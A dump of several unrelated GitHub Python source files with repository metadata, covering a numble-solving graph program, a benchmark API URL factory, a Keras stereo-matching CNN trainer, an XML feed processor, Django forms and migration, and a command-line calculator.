|
refs/heads/master
| 2022-07-10T16:41:56.853165
| 2019-07-21T13:08:48
| 2019-07-21T13:08:48
| 107,653,001
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 57
|
py
|
/Users/yucheng/.pyenv/versions/3.6.5/lib/python3.6/abc.py
|
[
"a541203951@163.com"
] |
a541203951@163.com
|
b99ea9b50ddacb576b647352eaa380cb3fe01ead
|
52a4d282f6ecaf3e68d798798099d2286a9daa4f
|
/old/numbo3b.py
|
e2056fe597131fa362550170c99661273978b41b
|
[
"MIT"
] |
permissive
|
bkovitz/FARGish
|
f0d1c05f5caf9901f520c8665d35780502b67dcc
|
3dbf99d44a6e43ae4d9bba32272e0d618ee4aa21
|
refs/heads/master
| 2023-07-10T15:20:57.479172
| 2023-06-25T19:06:33
| 2023-06-25T19:06:33
| 124,162,924
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,846
|
py
|
# numbo3b.py -- Manually "compiled" FARGish for brute-force numble solver
from operator import add, mul
from functools import reduce
from PortGraph import Node, Tag
from bases import ActiveNode
from Action import Action, FuncAction, Build, ActionSeq, SelfDestruct, Raise, \
Fail
from NodeSpec import NodeOfClass, NodeWithTag, NodeWithValue, HasSameValue, \
And, Not, CartesianProduct, TupAnd, NotLinkedToSame, no_dups
from LinkSpec import LinkSpec
from exc import FargDone
import expr
port_label_connections = {
# TODO
}
class Avail(Tag):
pass
class Consumed(Tag):
pass
class Failed(Tag):
pass
class Backtrack(Tag):
pass
class Done(Tag):
'''Indicates that an ActiveNode that has a single action to do has
done it.'''
pass
class Allowed(Tag):
'''Indicates an allowed Operator for solving the current numble.'''
pass
class Workspace(Node):
pass
class Number(Node):
def __init__(self, n):
self.value = n
class Target(Number):
pass
class Brick(Number):
pass
class Block(Number):
def fail(self, g, thisid):
for builder in g.neighbors(thisid, port_label='builder'):
g.datum(builder).fail(g, builder)
class Operator(Node):
pass
class Plus(Operator):
expr_class = expr.Plus # TODO How to put this in FARGish?
class Times(Operator):
expr_class = expr.Times # TODO How to put this in FARGish?
class Want(Tag, ActiveNode):
operands_scout_link = LinkSpec('agents', 'behalf_of')
backtracking_scout_link = LinkSpec('agents', 'behalf_of')
done_scout_link = LinkSpec('agents', 'behalf_of')
def actions(self, g, thisid):
targetid = g.taggee_of(thisid)
s1 = None
if not g.has_neighbor_at(
thisid, 'agents', neighbor_class=OperandsScout
):
s1 = Build(OperandsScout, [self.operands_scout_link], [thisid],
kwargs=dict(targetid=targetid))
s2 = None
# if not g.has_neighbor_at(
# thisid, 'agents', neighbor_class=BacktrackingScout
# ):
# s2 = Build(BacktrackingScout, [self.backtracking_scout_link], [thisid], kwargs=dict(targetid=targetid))
s3 = None
if not g.has_neighbor_at(
thisid, 'agents', neighbor_class=DoneScout
):
s3 = Build(DoneScout, [self.done_scout_link], [thisid],
kwargs=dict(targetid=targetid))
# s1 = Build.maybe_make(OperandsScout, behalf_of=thisid)
# s2 = Build.maybe_make(
# BacktrackingScout, behalf_of=thisid, targetid=targetid
# )
# s3 = Build.maybe_make(
# DoneScout, behalf_of=thisid, targetid=targetid
# )
return [s1, s2, s3]
class OperandsScout(ActiveNode):
# IDEA Break it down into more scouts: OperatorScout and OperandsScout.
# OperatorScout chooses an operator and then starts an OperandsScout
# weighted in a way that makes sense for the operator and target.
# An OperandsScout chooses operands and then chooses an operator,
# weighting probabilities to suit the operands.
# STILL BETTER Let OperatorScout and OperandsScout form coalitions.
# ANOTHER IDEA Multiple OperandsScouts, each looking at number nodes and
# deciding how or whether to combine them into a group of operands.
def __init__(self, targetid):
self.targetid = targetid
link_specs = [
LinkSpec('proposer', 'consume-operand'),
LinkSpec('proposer', 'consume-operand'),
LinkSpec('proposer', 'proposed-operator')
]
nodes_finder = CartesianProduct(
NodeWithTag(Number, Avail),
NodeWithTag(Number, Avail),
NodeWithTag(Operator, Allowed),
whole_tuple_criterion=TupAnd(
no_dups,
NotLinkedToSame(
*[link_spec.old_node_port_label for link_spec in link_specs]
)
)
)
def actions(self, g, thisid):
#TODO on-behalf-of ?
node_tup = self.nodes_finder.see_one(g)
print('NODE_TUP', node_tup)
if node_tup is not None:
return [Build(ConsumeOperands, self.link_specs, node_tup)]
# cos_in_progress = list(
# g.nodes_without_tag(Failed,
# nodes=g.nodes_without_tag(Done,
# nodes=g.nodes_of_class(ConsumeOperands))
# )
# )
cos_in_progress = [
co for co in g.nodes_of_class(ConsumeOperands)
if g.datum(co).can_go(g, co)
]
print('COS', cos_in_progress)
if cos_in_progress:
return []
# no operands to consume, so fail, i.e. trigger backtracking
nodeid = NodeWithTag(Block, Avail).see_one(g)
if g.value_of(nodeid) != g.value_of(self.targetid):
return [Fail(nodeid)]
def arith_result(g, operator_id):
operator_class = g.class_of(operator_id)
operand_ids = g.neighbors(operator_id, port_label='operands')
operand_values = [g.value_of(o) for o in operand_ids]
print('ARITH', operand_ids)
# TODO It would be much better if FARGish let you define these operations
# as class attributes.
if operator_class == Plus:
return reduce(add, operand_values, 0)
elif operator_class == Times:
return reduce(mul, operand_values, 1)
else:
raise ValueError(f'Unknown operator class {operator_class} of node {operator_id}.')
class ConsumeOperands(ActiveNode):
def actions(self, g, thisid):
if self.can_go(g, thisid):
return [self.MyAction(g, thisid)]
def can_go(self, g, thisid):
return (
not g.has_tag(thisid, Done)
and
g.all_have_tag(Avail, self.my_operands(g, thisid))
)
@classmethod
    def my_operands(cls, g, thisid):
return g.neighbors(thisid, port_label='consume-operand')
class MyAction(Action):
threshold = 0.0 # 1.0
#IDEA Let probability weight be support - threshold
def __init__(self, g, thisid):
self.thisid = thisid
def go(self, g):
op_class = g.class_of(
g.neighbor(self.thisid, port_label='proposed-operator')
)
operand_ids = g.neighbors(
self.thisid, port_label='consume-operand'
)
op_id = g.make_node(op_class, builder=self.thisid) #TODO container?
for operand_id in operand_ids:
g.add_edge(op_id, 'operands', operand_id, 'consumer')
result_id = g.make_node(
Block(arith_result(g, op_id)), builder=self.thisid
)
g.add_edge(result_id, 'source', op_id, 'consumer')
g.move_tag(Avail, operand_ids, result_id)
g.add_tag(Consumed, operand_ids)
g.add_tag(Done, self.thisid)
@classmethod
def fail(cls, g, thisid):
built_number_ids = g.neighbors(
thisid, port_label='built', neighbor_class=Number
)
operand_ids = g.neighbors(
thisid, port_label='consume-operand'
)
if g.all_have_tag(Avail, built_number_ids):
g.move_tag(Avail, built_number_ids, operand_ids)
g.remove_tag(operand_ids, Consumed)
g.add_tag(Failed, thisid)
for built_id in g.neighbors(thisid, port_label='built'):
g.add_tag(Failed, built_id)
class NumboSuccess(FargDone):
def __init__(self, expr):
self.expr = expr
def __str__(self):
return 'Success! ' + str(self.expr)
class DoneScout(ActiveNode):
def __init__(self, targetid):
self.targetid = targetid
def actions(self, g, thisid):
v = g.value_of(self.targetid)
#node_ids = NodeWithTag(Number, Avail).see_all(g)
#winner_id = next((g.value_of(id) == v for id in node_ids), None)
winner_id = \
NodeWithValue(v, nodeclass=Number, tagclass=Avail).see_one(g)
if winner_id is not None:
return [Raise(NumboSuccess,
expr.Equation(
extract_expr(g, winner_id),
extract_expr(g, self.targetid)))]
def extract_expr(g, nodeid):
'''Extracts an Expr tree consisting of nodeid and its sources.'''
nodeclass = g.class_of(nodeid)
if issubclass(nodeclass, Block):
return extract_expr(g, g.neighbor(nodeid, 'source'))
elif issubclass(nodeclass, Number):
return expr.Number(g.value_of(nodeid))
elif issubclass(nodeclass, Operator):
operand_exprs = (
extract_expr(g, n)
for n in g.neighbors(nodeid, ['source', 'operands'])
)
return g.datum(nodeid).expr_class(*operand_exprs)
else:
raise ValueError(f'extract_expr: node {nodeid} has unrecognized class {nodeclass}')
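
# --- Editor's note, not part of the original file. ---
# Worked example of extract_expr's recursion, assuming the graph wiring that
# ConsumeOperands.MyAction builds above: a Block produced from Bricks 4 and 5
# via a Plus node resolves through its 'source' link to the Plus node, whose
# operand Numbers become expr.Number(4) and expr.Number(5), yielding
# expr.Plus(expr.Number(4), expr.Number(5)) for the success Equation.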
|
[
"bkovitz@indiana.edu"
] |
bkovitz@indiana.edu
|
61949f125838218983b65ad45b039efb2dac8f37
|
23ad12ba79d614e08a803d123ba9a7bf4fd08fef
|
/benchengine/api/route.py
|
b52fc40650e1def7151c2cae4572fdad45f3bf34
|
[
"MIT"
] |
permissive
|
scailfin/benchmark-engine
|
ab40026dd5b629ae8d855867abf4725ec9f69213
|
7ee5a841c1de873e8cafe2f10da4a23652395f29
|
refs/heads/master
| 2020-06-04T08:49:51.709979
| 2019-12-04T19:19:15
| 2019-12-04T19:19:15
| 191,950,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,489
|
py
|
# This file is part of the Reproducible Open Benchmarks for Data Analysis
# Platform (ROB).
#
# Copyright (C) 2019 NYU.
#
# ROB is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Factory for Urls to access and manipulate API resources."""
import benchengine.config as config
class UrlFactory(object):
"""The Url factory provides methods to generate API urls to access and
manipulate resources. For each API route there is a corresponding factory
method to generate the respective Url.
"""
def __init__(self, base_url=None):
"""Initialize the base Url for the service API. If the argument is not
given the value is expcted in the environment variable
'benchengine_API_BASEURL'.
Parameters
----------
base_url: string
Base Url for all API resources
"""
# Set base Url depending on whether it is given as argument or not
if base_url is None:
self.base_url = config.get_apiurl()
else:
self.base_url = base_url
# Remove trailing '/' from the base url
while self.base_url.endswith('/'):
self.base_url = self.base_url[:-1]
# Set base Url for resource related requests
self.benchmark_base_url = self.base_url + '/benchmarks'
self.team_base_url = self.base_url + '/teams'
self.user_base_url = self.base_url + '/user'
def add_team_members(self, team_id):
"""Url to POST list of new team members.
Parameters
----------
team_id: string
Unique team identifier
Returns
-------
string
"""
return self.get_team(team_id) + '/members'
def delete_file(self, team_id, file_id):
"""Url to DELETE a previously uploaded file.
Parameters
----------
team_id: string
Unique team identifier
file_id: string
Unique file identifier
Returns
-------
string
"""
return self.team_files(team_id) + '/' + file_id
def download_file(self, team_id, file_id):
"""Url to GET a previously uploaded file.
Parameters
----------
team_id: string
Unique team identifier
file_id: string
Unique file identifier
Returns
-------
string
"""
return self.team_files(team_id) + '/' + file_id + '/download'
def get_benchmark(self, benchmark_id):
"""Url to GET benchmark handle.
Parameters
----------
benchmark_id: string
Unique benchmark identifier
Returns
-------
string
"""
return self.benchmark_base_url + '/' + benchmark_id
def get_leaderboard(self, benchmark_id):
"""Url to GET benchmark leaderboard.
Parameters
----------
benchmark_id: string
Unique benchmark identifier
Returns
-------
string
"""
return self.get_benchmark(benchmark_id) + '/leaderboard'
def get_team(self, team_id):
"""Url to GET team handle.
Parameters
----------
team_id: string
Unique team identifier
Returns
-------
string
"""
return self.team_base_url + '/' + team_id
def list_benchmarks(self):
"""Url to GET a list of all benchmarks.
Returns
-------
string
"""
return self.benchmark_base_url
def list_teams(self):
"""Url to GET list of teams that a user is subscribed to and to POST a
create team request.
Returns
-------
string
"""
return self.team_base_url
def login(self):
"""Url to POST user credentials for login.
Returns
-------
string
"""
return self.user_base_url + '/login'
def logout(self):
"""Url to POST user logout request.
Returns
-------
string
"""
return self.user_base_url + '/logout'
def remove_team_member(self, team_id, user_id):
"""Url to DELETE a member for a team.
Parameters
----------
team_id: string
Unique team identifier
user_id: string
Unique user identifier
Returns
-------
string
"""
return self.add_team_members(team_id) + '/' + user_id
def service_descriptor(self):
"""Url to GET the service descriptor.
Returns
-------
string
"""
return self.base_url
def team_files(self, team_id):
"""Base Url to access uploaded files for a given team.
Parameters
----------
team_id: string
Unique team identifier
Returns
-------
string
"""
return self.get_team(team_id) + '/files'
def upload_file(self, team_id):
"""Url to POST a new file to upload. The uploaded file is associated
with the given team.
Parameters
----------
team_id: string
Unique team identifier
file_id: string
Unique file identifier
Returns
-------
string
"""
return self.team_files(team_id) + '/upload'
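
# --- Editor's note: hedged usage sketch, not part of the original file. ---
# The identifiers below ('b42', 't1', 'u7') are made-up placeholders.
#   urls = UrlFactory(base_url='https://rob.example.org/api/')
#   urls.get_leaderboard('b42')          # .../api/benchmarks/b42/leaderboard
#   urls.remove_team_member('t1', 'u7')  # .../api/teams/t1/members/u7
#   urls.upload_file('t1')               # .../api/teams/t1/files/upload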
|
[
"heiko.muller@gmail.com"
] |
heiko.muller@gmail.com
|
bcb16c4b1d663c8ad8aa71fec1db6058abc08a41
|
cbce900c283ff249bca8a3d370822f1578f3e55e
|
/mc-cnn-rebuild.py
|
2e7fc63f1712946a65a498a37cdaf71c46d788eb
|
[] |
no_license
|
b03901165Shih/2018-CV-Final-Project
|
c53485794c53f0d40a42f9aa314ee9bad01638dc
|
c6a267f918cf76e8bf749bebb7071f817a307389
|
refs/heads/master
| 2020-06-22T17:22:27.241326
| 2019-07-19T16:26:18
| 2019-07-19T16:26:18
| 197,754,278
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,731
|
py
|
import numpy as np
import time
import os
#os.environ["CUDA_VISIBLE_DEVICES"]="0"
import h5py
import glob
import matplotlib.pyplot as plt
#np.random.seed(2019)
from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Activation, Flatten, Input, Concatenate
from keras.layers import Conv2D, MaxPooling2D
from keras import optimizers
from keras.layers.advanced_activations import ELU
from keras.utils import np_utils
from keras import backend as K
from PIL import Image
from keras.layers.normalization import BatchNormalization
from preprocess import getTrain
from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau
from keras.preprocessing.image import ImageDataGenerator
SEED=2019
def augment_data( generator, X1, X2, y, batch_size = 32 ):
generator_seed = np.random.randint( SEED )
gen_X1 = generator.flow( X1, y,
batch_size = batch_size, seed = generator_seed )
gen_X2 = generator.flow( X2, y,
batch_size = batch_size, seed = generator_seed )
while True:
X1i = gen_X1.next()
X2i = gen_X2.next()
yield [ X1i[0], X2i[0] ], X1i[1]
def unison_shuffled_copies(a, b, c):
p = np.random.permutation(a.shape[0])
return a[p], b[p], c[p]
# Define the parameters for training
batch_size = 256
nb_classes = 2
nb_epoch = 120
# input image dimensions
img_rows, img_cols = 11, 11
# Volume of the training set
#sample_number = 10000#430608
nb_filters = 112
# CNN kernel size
kernel_size = (3,3)
# Here some additional preprocess methods like rotation etc. could be added.
input_shape = (img_rows, img_cols, 1)
for i in range(1):
#finetune = True
if(i==0):
finetune = True
tic = time.time()
(X1_train, X2_train, y_train) = getTrain()
toc = time.time()
print ("Time for loading the training set: ", toc-tic)
    # Briefly check some patches. Positive-matching patches are expected to share similar features. We store two left patches in X1_train: one matching the positive right patch in X2_train, the other matching a negative right patch in X2_train.
X1_train = X1_train.astype('float32').reshape((X1_train.shape[0],img_rows, img_cols, 1))
X2_train = X2_train.astype('float32').reshape((X1_train.shape[0],img_rows, img_cols, 1))
X1_train, X2_train, y_train =unison_shuffled_copies(X1_train, X2_train, y_train)
valid_split = 0.9
train_size = (int)(valid_split*X1_train.shape[0])
X1_train_split = X1_train[:train_size]
X2_train_split = X2_train[:train_size]
y_train_split = y_train[:train_size]
X1_valid_split = X1_train[train_size:]
X2_valid_split = X2_train[train_size:]
y_valid_split = y_train[train_size:]
print('X1_valid_split.shape:',X1_valid_split.shape)
print('X2_valid_split.shape:',X2_valid_split.shape)
print('y_valid_split.shape :',y_valid_split.shape)
datagen = ImageDataGenerator(
rotation_range = 20,
#width_shift_range = 0.1,
#height_shift_range = 0.1,
shear_range = 0.1,
#zoom_range = [0.8,1],
#channel_shift_range= 0.1,
horizontal_flip = True,
vertical_flip = True
)
train_generator = augment_data( datagen, X1_train_split, X2_train_split, y_train_split, batch_size = batch_size )
'''
[X1b, X2b], y = next(train_generator)
print(X1b)
print(np.array(X1b).shape)
print(np.array(X2b).shape)
for k in range(len(X1b)):
plt.imshow(np.concatenate([X1_train_split[k,:,:,0],X2_train_split[k,:,:,0],X1b[k,:,:,0],X2b[k,:,:,0]],1)); plt.show()'''
    # This neural network trains well and ends up with a training accuracy of more than 90%.
#for i in range(3):
#y_train = np.expand_dims(y_train,axis=2)
print ('X1_train.shape',X1_train.shape)
print ('y_train.shape',y_train.shape)
'''
for i in range(sample_number>>1):
print(y_train[2*i],y_train[2*i+1])
plt.imshow(np.concatenate([X1_train[2*i], X2_train[2*i], X2_train[2*i+1]],1)); plt.show()
'''
left_inputs = Input(input_shape)
right_inputs = Input(input_shape)
Conv1 = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
Conv2 = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
Conv3 = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
Conv4 = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
sub_net = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
left_branch = sub_net(Conv4(Conv3(Conv2(Conv1(left_inputs )))))
right_branch = sub_net(Conv4(Conv3(Conv2(Conv1(right_inputs)))))
merged = Concatenate(axis=-1)([left_branch, right_branch])
ft = Flatten()(merged)
dn1 = Dense(384, activation='relu')(ft)
dn2 = Dense(384, activation='relu')(dn1)
dn3 = Dense(384, activation='relu')(dn2)
output = Dense(1, activation='sigmoid')(dn3)
fc = Model([left_inputs,right_inputs],output)
fc.summary()
if(finetune):
fc.load_weights(filepath='my_mccnn_new4.h5')
#callbacks = [ModelCheckpoint(filepath='my_mccnn_new3.h5', verbose=1, save_best_only=True)]
callbacks = [
EarlyStopping(monitor='val_loss', patience=15, verbose=1, min_delta=1e-5),
ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3, cooldown=0, verbose=1, min_lr=1e-8),
ModelCheckpoint(monitor='val_loss', filepath='my_mccnn_new4.h5', verbose=1, save_best_only=True, mode='auto')
]
optimizer = optimizers.adam(lr=2e-4, decay=1e-7)#optimizers.SGD(lr=1e-4, decay=1e-7, momentum=0.9, nesterov=True)#optimizers.adam(lr=8e-5, decay=1e-8)
fc.compile(optimizer=optimizer, loss='binary_crossentropy', metrics=['accuracy'])
fc.fit_generator( train_generator,
steps_per_epoch = len(X1_train_split)//batch_size,
epochs = nb_epoch,
callbacks = callbacks, verbose = 1,
validation_data = [[X1_valid_split, X2_valid_split], y_valid_split] )
#fc.fit([X1_train,X2_train], y_train, validation_split=0.1, batch_size=batch_size, epochs = nb_epoch, shuffle=True, callbacks = callbacks)
# Evaluate the result based on the training set
#score = fc.evaluate([X1_train,X2_train], y_train, verbose=0)
# print score.shape
#fc.save('my_mccnn_new4.h5')
#print('Test score: ', score[0])
#print('Test accuracy: ', score[1])
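
# --- Editor's note: hedged inference sketch, not part of the original file. ---
# After training, the network scores how well a left/right 11x11 patch pair
# matches; shapes follow the (img_rows, img_cols, 1) input defined above.
#   left = np.random.rand(1, 11, 11, 1).astype('float32')   # stand-in patch
#   right = np.random.rand(1, 11, 11, 1).astype('float32')
#   score = fc.predict([left, right])[0, 0]  # near 1.0 = likely match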
|
[
"b03901165@ntu.edu.tw"
] |
b03901165@ntu.edu.tw
|
3cc34c234ffb6b97cde45f5ddc3bb4a63f785718
|
48ab96560529c07069c66b47952b83461d0ef710
|
/processing.py
|
c0e465f801a7eee06d9937d672cf00cbffa38e99
|
[] |
no_license
|
mctrap/XMLParser_AdRoll
|
4f3960a3692c2f87f2b1ff1388e5d11089a95319
|
8a0bd1da6587e559271a552db0e90868596ad1bb
|
refs/heads/master
| 2020-03-29T04:11:11.799220
| 2018-09-19T23:49:28
| 2018-09-19T23:49:28
| 149,519,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,072
|
py
|
import xml.etree.ElementTree as ET
import os
def get_listing(filename_contents):
listing = ""
# remaining = ""
end_marker = "</listing>"
while True:
line = filename_contents.readline()
if end_marker in line:
            # Keep everything up to and including the end marker; the original
            # slice [index : len(end_marker)] dropped the closing tag.
            listing += line[:line.index(end_marker) + len(end_marker)]
# remaining = line.replace(end_marker, "")
break
elif line == "":
break
else:
listing += line
return listing
def find_address_index(tree):
for i, child in enumerate(tree):
if child.tag == "address":
return i
return None
def add_city_element(listing, i):
try:
tree = ET.fromstring(listing)
        # We are assuming the address element is at index 9
        # and the city is at position 1
try:
assert tree[9][1].attrib['name'] == "city"
city = tree[9][1].text
except:
print("{} Order of tags is not correct".format(i))
city = ""
city_element = ET.Element("city")
city_element.text = city
tree.append(city_element)
return ET.tostring(tree)
    except Exception as err:
        # Debugger hook removed; report the error and bail out.
        print(err)
        return None
def process_file_contents(filename_contents, output_file, skip=0):
    listing = get_listing(filename_contents)
remaining = "<listing>"
i = 0
while listing != "":
i += 1
if remaining not in listing:
listing = remaining + listing
new_listing = add_city_element(listing, i)
listing = get_listing(filename_contents)
if new_listing is None:
continue
if i < skip:
continue
with open(output_file, "a") as result_file:
result_file.write(new_listing)
if i % 100 == 0:
print "{} listings processed".format(i)
def rapid_count(filename_contents):
counter = 0
line = filename_contents.readline()
while line != "":
if "<listing>" in line:
counter += 1
line = filename_contents.readline()
if counter % 10000 == 0:
print "{} so far".format(counter)
print "{} total".format(counter)
if __name__=="__main__":
## CHANGE THIS VARIABLE
## then click run.sh
# filename = "AdrollFeed_9.17.xml"
path = "/Users/marktrapani/Documents/Feeds/Adroll"
input_folder = os.path.join(path, "input")
output_folder = os.path.join(path, "output")
all_files = [ f for f in os.listdir(input_folder) if ".xml" in f ]
files_to_process = []
for filename in all_files:
if os.path.exists(os.path.join(output_folder, filename)):
print("{} already processed".format(filename))
continue
files_to_process.append(filename)
if len(files_to_process) == 0:
print "Nothing to process"
for filename in files_to_process:
output_file = os.path.join(output_folder, filename)
filename_contents = open(os.path.join(input_folder, filename), "r")
# rapid_count(filename_contents)
# 237979
top_file = """<?xml version="1.0"?>
<listings>
<title>Apartment List feed</title>
<link rel="self" href="https://www.apartmentlist.com"/>
"""
end_file = "</listings>"
with open(output_file, "w") as result_file:
result_file.write(top_file)
process_file_contents(filename_contents, output_file)
with open(output_file, "a") as result_file:
result_file.write(end_file)
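
# --- Editor's note: hedged usage sketch, not part of the original file. ---
# get_listing consumes one <listing>...</listing> block per call:
#   import io
#   feed = io.StringIO("<listing>\n<id>1</id>\n</listing>\n<listing>\n")
#   get_listing(feed)  # -> '<listing>\n<id>1</id>\n</listing>'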
|
[
"mtrapani@apartmentlist.com"
] |
mtrapani@apartmentlist.com
|
21a8a55aa43fdbf262aa6277530f0e10cb1885b4
|
e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f
|
/indices/nnirrig.py
|
e0b5905774a6c4fac90f7e3c2509f538d136173e
|
[] |
no_license
|
psdh/WhatsintheVector
|
e8aabacc054a88b4cb25303548980af9a10c12a8
|
a24168d068d9c69dc7a0fd13f606c080ae82e2a6
|
refs/heads/master
| 2021-01-25T10:34:22.651619
| 2015-09-23T11:54:06
| 2015-09-23T11:54:06
| 42,749,205
| 2
| 3
| null | 2015-09-23T11:54:07
| 2015-09-18T22:06:38
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
ii = [('CookGHP3.py', 1), ('LyelCPG2.py', 3), ('SadlMLP.py', 1), ('AubePRP2.py', 1), ('LeakWTI2.py', 13), ('LeakWTI3.py', 9), ('PettTHE.py', 1), ('WilkJMC2.py', 19), ('RoscTTI3.py', 2), ('KiddJAE.py', 1), ('CoolWHM.py', 1), ('LandWPA.py', 1), ('LyelCPG.py', 1), ('GilmCRS.py', 3), ('DibdTRL2.py', 1), ('LeakWTI4.py', 11), ('LeakWTI.py', 4), ('MedwTAI2.py', 1), ('WilkJMC.py', 13), ('MackCNH.py', 2), ('FitzRNS4.py', 17), ('SadlMLP2.py', 1), ('BowrJMM3.py', 1), ('BeckWRE.py', 2), ('KirbWPW.py', 1), ('ClarGE4.py', 4)]
|
[
"varunwachaspati@gmail.com"
] |
varunwachaspati@gmail.com
|
b53ae90ac49a9f4d4a2d5858314cbe16235c915b
|
add102645cbe98956b51647608c9a9c25930f0ae
|
/punti_interesse/migrations/0008_auto_20190208_1148.py
|
3c6cbc14a36e918895a558fa587bc4a5b35b5c44
|
[] |
no_license
|
GianpaoloBranca/CAI-Punti-Interesse
|
2f8ef19975fa64108f1be98a1169c6eedc89499f
|
6543a83dfa260fae0a68e496493938c758080674
|
refs/heads/master
| 2020-04-15T17:42:21.144842
| 2019-05-27T10:13:09
| 2019-05-27T10:13:09
| 164,883,356
| 1
| 0
| null | 2019-03-07T15:37:42
| 2019-01-09T14:59:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-02-08 10:48
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import punti_interesse.validators
class Migration(migrations.Migration):
dependencies = [
('punti_interesse', '0007_auto_20190130_1752'),
]
operations = [
migrations.RenameField(
model_name='puntointeresse',
old_name='tipo',
new_name='sottocategoria',
),
migrations.AlterField(
model_name='puntointeresse',
name='latitudine',
field=models.DecimalField(decimal_places=6, max_digits=9, validators=[punti_interesse.validators.validate_degree], verbose_name='Latitudine'),
),
migrations.AlterField(
model_name='puntointeresse',
name='longitudine',
field=models.DecimalField(decimal_places=6, max_digits=9, validators=[punti_interesse.validators.validate_degree], verbose_name='Longitudine'),
),
migrations.AlterField(
model_name='validazionepunto',
name='quota',
field=models.IntegerField(validators=[django.core.validators.MinValueValidator(0)], verbose_name='Quota'),
),
]
|
[
"gianpaolo.branca@protonmail.com"
] |
gianpaolo.branca@protonmail.com
|
0e1aee4f477bca387c50733cad7219c7a0d59c31
|
035663d678908d7cc5b8390695c6713be6d57c35
|
/finance/forms.py
|
531c6194fa1bbe9b9c559af6bff3cbb5965add9e
|
[] |
no_license
|
DyadyaSasha/tehnoatom_homework5
|
b1e66f5099465acc72cebc9d05c17d1144e2fd7b
|
efe67566eeacc9e63a963bb06994181d47e45294
|
refs/heads/master
| 2021-01-12T10:01:36.865855
| 2016-12-13T08:05:33
| 2016-12-13T08:05:33
| 76,336,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,385
|
py
|
from django import forms
from datetime import date
import re
from .models import Acount, Charge
class AcountForm(forms.ModelForm):
class Meta:
model = Acount
fields = ('name', 'number')
def clean(self):
#CREDIT_CARD_VALID = r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\d{11})$'
number = self.cleaned_data.get('number')
#number = number.replace(' ', '').replace('-', '')
number = number.replace(' ', '')
#if not re.match(CREDIT_CARD_VALID, number):
if len(number) != 16:
self.add_error(
'number', "Card number you specified is not valid.")
self.cleaned_data['number'] = number
return self.cleaned_data
class ChargeForm(forms.ModelForm):
class Meta:
model = Charge
fields = ('transaction', 'dat')
def clean(self):
cleaned_data = super(ChargeForm, self).clean()
transaction = cleaned_data.get('transaction')
dat = cleaned_data.get('dat')
        if transaction == 0 or transaction is None:
            self.add_error('transaction', "Transaction can't equal zero")
        # Guard against missing values so the comparisons below can't raise
        # a TypeError on None.
        if transaction is not None and transaction < 0 and dat is not None and dat > date.today():
            self.add_error('transaction', "Invalid transaction")
return cleaned_data
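
# --- Editor's note: hedged usage sketch, not part of the original file. ---
# Requires a configured Django project; the values are placeholders.
#   form = AcountForm(data={'name': 'Main card', 'number': '1234 5678 9012 3456'})
#   form.is_valid()              # True: spaces stripped, 16 digits remain
#   form.cleaned_data['number']  # '1234567890123456'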
|
[
"serebryakovalexx@yandex.ru"
] |
serebryakovalexx@yandex.ru
|
4c7c193f8937cefe3b4f6663c2c920906a54d22f
|
2eba6fde704171c6fa2989eb3f32eaeb6fa190c0
|
/calculator.py
|
a3bed1eaa223ae4ada556252baec2ad618b541db
|
[] |
no_license
|
lauren-moore/calculator-1
|
54638ce603546595986219a8ce600ba671021aeb
|
5fba5d8b8ddeaaba9e3d66d447d28b45619b4037
|
refs/heads/main
| 2023-08-30T16:50:04.177911
| 2021-10-20T03:10:05
| 2021-10-20T03:10:05
| 417,974,689
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,862
|
py
|
"""CLI application for a prefix-notation calculator."""
from arithmetic import *
while True:
user_input = input("Enter your equation > ")
tokens = user_input.split(" ")
if "q" in tokens:
print("You will exit.")
break
elif len(tokens) < 2:
print("Not enough inputs.")
continue
operator = tokens[0]
num1 = tokens[1]
    if len(tokens) < 3:
        num2 = "0"
    else:
        num2 = tokens[2]

    # Default the optional third operand so the "x+" branch can't raise a
    # NameError when only two numbers are supplied.
    num3 = "0"
    if len(tokens) > 3:
        num3 = tokens[3]
# A place to store the return value of the math function we call,
# to give us one clear place where that result is printed.
result = None
if not num1.isdigit() or not num2.isdigit():
print("Those aren't numbers!")
continue
# We have to cast each value we pass to an arithmetic function from a
# a string into a numeric type. If we use float across the board, all
# results will have decimal points, so let's do that for consistency.
elif operator == "+":
result = add(float(num1), float(num2))
elif operator == "-":
result = subtract(float(num1), float(num2))
elif operator == "*":
result = multiply(float(num1), float(num2))
elif operator == "/":
result = divide(float(num1), float(num2))
elif operator == "square":
result = square(float(num1))
elif operator == "cube":
result = cube(float(num1))
elif operator == "pow":
result = power(float(num1), float(num2))
elif operator == "mod":
result = mod(float(num1), float(num2))
elif operator == "x+":
result = add_mult(float(num1), float(num2), float(num3))
elif operator == "cubes+":
result = add_cubes(float(num1), float(num2))
else:
result = "Please enter an operator followed by two integers."
print(result)
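
# --- Editor's note: hedged example session, not part of the original file. ---
# Outputs assume arithmetic.add/mod implement the usual operations.
#   Enter your equation > + 3 4    ->  7.0
#   Enter your equation > mod 7 3  ->  1.0
#   Enter your equation > q        ->  You will exit.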
|
[
"laurencaroleen@gmail.com"
] |
laurencaroleen@gmail.com
|
